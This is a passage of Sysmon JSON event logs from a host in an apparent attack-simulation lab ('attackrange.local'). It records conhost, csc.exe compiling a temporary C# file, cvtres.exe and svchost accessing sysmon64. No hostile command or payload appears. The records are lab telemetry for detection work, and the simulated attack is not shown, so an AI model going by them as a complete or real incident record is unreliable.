6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5113,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.424\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D0-5F25-0000-001073150800}\r\nTargetProcessId: 4444\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.424","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D0-5F25-0000-001073150800}","TargetProcessId":"4444","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5114,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.523\r\nProcessGuid: {41C8662E-20D0-5F25-0000-001000190800}\r\nProcessId: 2996\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESB1A4.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSC7A32E84C1276434289F9177F282A3AA7.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {41C8662E-20D0-5F25-0000-001073150800}\r\nParentProcessId: 4444\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\nga0qtan.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.523","ProcessGuid":"{41C8662E-20D0-5F25-0000-001000190800}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESB1A4.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSC7A32E84C1276434289F9177F282A3AA7.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{41C8662E-20D0-5F25-0000-001073150800}","ParentProcessId":"4444","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\nga0qtan.cmdline\"","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5115,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.518\r\nSourceProcessGUID: {41C8662E-20D0-5F25-0000-001073150800}\r\nSourceProcessId: 4444\r\nSourceThreadId: 4364\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {41C8662E-20D0-5F25-0000-001000190800}\r\nTargetProcessId: 2996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.518","SourceProcessGUID":"{41C8662E-20D0-5F25-0000-001073150800}","SourceProcessId":"4444","SourceThreadId":"4364","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{41C8662E-20D0-5F25-0000-001000190800}","TargetProcessId":"2996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5116,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.518\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D0-5F25-0000-001000190800}\r\nTargetProcessId: 2996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.518","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D0-5F25-0000-001000190800}","TargetProcessId":"2996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5117,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.518\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.518","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5118,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.518\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.518","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5119,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.518\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.518","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5120,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.518\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.518","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
